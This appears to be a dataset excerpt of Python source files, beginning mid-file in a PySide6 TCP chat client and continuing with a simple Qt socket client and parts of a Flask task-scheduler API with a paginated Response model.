self.name = name
opcode = "@"
            opcode += before_name
opcode += "_"
opcode += self.name
self._sock.write(opcode.encode())
change_text = " 으로 변경\n"+ "↖" + self.client_ip + "↗"
self._sock.write(change_text.encode())
@Slot()
def disconnect_handler(self):
self.label.setText("연결이 해제되었습니다.")
self.btn_ip_set.click()
message = "연결이 해제되었습니다. !"
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot(QTcpSocket.SocketError)
def error_handler(self, error_code : QTcpSocket.SocketError):
if error_code:
message = "연결중입니다..."
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot()
def connect_handler(self):
message = "접속 되었습니다."
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
self.btn_ip_set.setText("연결 끊기")
self.bind_flag = True
self._sock.write(self.client_ip.encode())
@Slot()
def readyRead_handler(self):
if self._sock.bytesAvailable():
data = bytes(self._sock.readAll())
data = data.decode()
if data[-10:] == "@list_info":
text = self.name + " -> " + self.client_ip
self._sock.write(text.encode())
return 0
item = QListWidgetItem()
item.setText(data)
item.setTextAlignment(Qt.AlignLeft)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot()
def btn_ip_handler(self):
if self.bind_flag == False:
ip_set = "현재 서버 : "
ip = self.lineEdit_ip_set.text()
ip_set += ip
self.label.setText(ip_set)
self._sock.connectToHost(ip, 9500)
self.lineEdit_ip_set.clear()
elif self.bind_flag == True:
self._sock.disconnectFromHost()
self.label.setText("연결이 해제되었습니다.")
self.btn_ip_set.setText("접속")
self.bind_flag = False
@Slot()
def btn_message_handler(self):
if len(self.lineEdit_message.text()) > 0:
message = f"!{self.name} : {self.lineEdit_message.text()}"
self._sock.write(message.encode())
item = QListWidgetItem()
item.setText(message[1:])
item.setTextAlignment(Qt.AlignRight)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
self.lineEdit_message.clear()
if __name__ == "__main__":
winname = "ddatG-Client"
check = win32gui.FindWindow(None, winname)
if not check:
app = QApplication(sys.argv)
window = Mainwindow()
#app.setStyle('Fusion')
apply_stylesheet(app, theme = 'dark_blue.xml')
window.show()
app.exec()
``` |
{
"source": "100dlswjd/message",
"score": 2
} |
#### File: message/client/main_client.py
```python
import sys
import win32api
import win32con
import time
from PySide6.QtWidgets import QMainWindow, QApplication
from PySide6.QtNetwork import QTcpSocket
from PySide6.QtCore import Slot
from threading import Thread, Event
from Client_form import Ui_MainWindow
class Mainwindow(QMainWindow, Ui_MainWindow):
def __init__(self):
super(Mainwindow, self).__init__()
self.setupUi(self)
self._ip = "000.000.000.000"
self.pushButton.clicked.connect(self.button_handler)
self._sock = QTcpSocket()
self._sock.connectToHost(self._ip, 9500)
self._sock.readyRead.connect(self.readyRead_handler)
self._sock.errorOccurred.connect(self.error_handler)
self._sock.connected.connect(self.connected_handler)
"""self._exit_event = Event()
self._exit_event.clear()
self._key_check_thread = Thread(target = self.key_check_proc)
self._key_check_thread.start()"""
"""def key_check_proc(self):
while self._exit_event.is_set() == False:
if self.lineEdit.text():
if win32api.GetAsyncKeyState(win32con.VK_RETURN) & 0x8000:
self.button_handler()
time.sleep(0.1)"""
@Slot()
def connected_handler(self):
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
        self.label_5.setText("연결 되었습니다 !")  # "Connected!"
@Slot(QTcpSocket.SocketError)
def error_handler(self, error_code : QTcpSocket.SocketError):
if error_code == QTcpSocket.SocketError.ConnectionRefusedError:
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
            self.label_5.setText("연결 중입니다 . . ")  # "Connecting . . "
self._sock.connectToHost(self._ip, 9500)
@Slot()
def readyRead_handler(self):
if self._sock.bytesAvailable():
data = bytes(self._sock.readAll())
data = data.decode()
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
self.label_5.setText(str(data))
@Slot()
def button_handler(self):
text = self.lineEdit.text()
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
        self.label_5.setText(f"내가 보냄 : {text}")  # "Sent by me: ..."
        self._sock.write(f"클라이언트에서 보냄 : {text}".encode())  # "Sent from the client: ..."
self.lineEdit.setText("")
time.sleep(0.1)
    def closeEvent(self, event) -> None:
        self._sock.disconnectFromHost()
        # _exit_event only exists if the disabled key-check thread above is
        # re-enabled; guard the access so closing the window cannot raise.
        if hasattr(self, "_exit_event"):
            self._exit_event.set()
        return super().closeEvent(event)
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Mainwindow()
window.show()
app.exec()
``` |
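Each handler above scrolls the five status labels by copying label texts upward by hand. A small refactoring sketch that centralizes that shift — the label names are taken from the code above, but this helper is a suggestion, not part of the repository:
```python
    def push_status(self, text: str):
        # Shift the five status labels up by one slot and show the new line at the bottom.
        labels = [self.label_1, self.label_2, self.label_3, self.label_4, self.label_5]
        for upper, lower in zip(labels, labels[1:]):
            upper.setText(lower.text())
        labels[-1].setText(text)
```
Each handler would then reduce to a single call such as `self.push_status("연결 되었습니다 !")`.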
{
"source": "100-gram/task-scheduler",
"score": 2
} |
#### File: 100-gram/task-scheduler/app.py
```python
from flask import make_response, jsonify
from werkzeug.exceptions import HTTPException
from flask_restful import Api
from server.server import Server
from router.api import api
from router.task_list import TaskList
from router.task import Task
from config.config import disable_log, api_prefix
app = Server(__name__)
restful_api = Api(app)
restful_api.add_resource(TaskList, f'{api_prefix}/tasks')
restful_api.add_resource(Task, f'{api_prefix}/tasks/<int:task_id>')
app.register_blueprint(api, url_prefix=api_prefix)
@app.route('/')
def root_handler():
return f'Api could be found at <a href="{api_prefix}">{api_prefix}</a>'
@app.errorhandler(HTTPException)
def error_handler(error):
return make_response(jsonify({'error': error.description}), error.code)
if __name__ == '__main__':
disable_log(app)
app.run()
```
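The `TaskList` and `Task` resources registered above live in `router/task_list.py` and `router/task.py`, which are not included in this entry. A minimal sketch of a flask_restful resource compatible with those registrations — the handler bodies and parameter names here are assumptions, not the project's actual implementation:
```python
from flask import request
from flask_restful import Resource

class TaskList(Resource):
    # Hypothetical sketch; the repository's real resource is not shown here.
    def get(self):
        # A real handler would read pagination params and query the data manager.
        offset = request.args.get('offset', 0, type=int)
        limit = request.args.get('limit', 10, type=int)
        return {'tasks': [], 'offset': offset, 'limit': limit}

    def post(self):
        payload = request.get_json(force=True)
        # A real handler would validate the payload and persist the new task.
        return payload, 201
```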
#### File: task-scheduler/model/response.py
```python
from typing import List

from model.task import Task
from config.config import test_suits_folder_path
"""
Wrapper for a paginated Response.
Provides all methods to manage a Response.
"""
class Response:
    def __init__(self, tasks: List[Task], offset: int, limit: int, query: str, count_all: int, status_filter=None):
"""
Constructor for Response object
:param tasks: list of Tasks
        :param offset: number of Tasks to skip
        :param limit: maximum number of Tasks per page
        :param query: search query string
        :param count_all: total number of Tasks
        :param status_filter: Task status to filter by
"""
self.tasks = tasks
self.count_all = count_all
self.status_filter = status_filter
self.offset = offset if isinstance(offset, int) and offset >= 0 else 0
self.limit = limit if isinstance(limit, int) and limit > 0 else None
        self.query = query if isinstance(query, str) and len(query) > 0 else None
def __json__(self):
"""
        JSON serialization for Response object
:return: dict with all inner fields
>>> a = Response([], 5, 5, "something", 20, True)
>>> a.__json__().__str__() == open(test_suits_folder_path + "/test_response.txt", 'r').read()
True
"""
return {
'tasks': self.tasks,
'offset': self.offset,
'limit': self.limit,
'query': self.query,
'count_all': self.count_all,
'status_filter': self.status_filter
}
for_json = __json__ # supported by simplejson
``` |
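The `for_json = __json__` alias exists so that `simplejson` can serialize `Response` objects directly: passing `for_json=True` to `simplejson.dumps` makes it call `for_json()` on any object that defines it. A short usage sketch (the task list is left empty so no `Task` internals are assumed):
```python
import simplejson

response = Response(tasks=[], offset=0, limit=10, query="report", count_all=42)
print(simplejson.dumps(response, for_json=True))
# {"tasks": [], "offset": 0, "limit": 10, "query": "report", "count_all": 42, "status_filter": null}
```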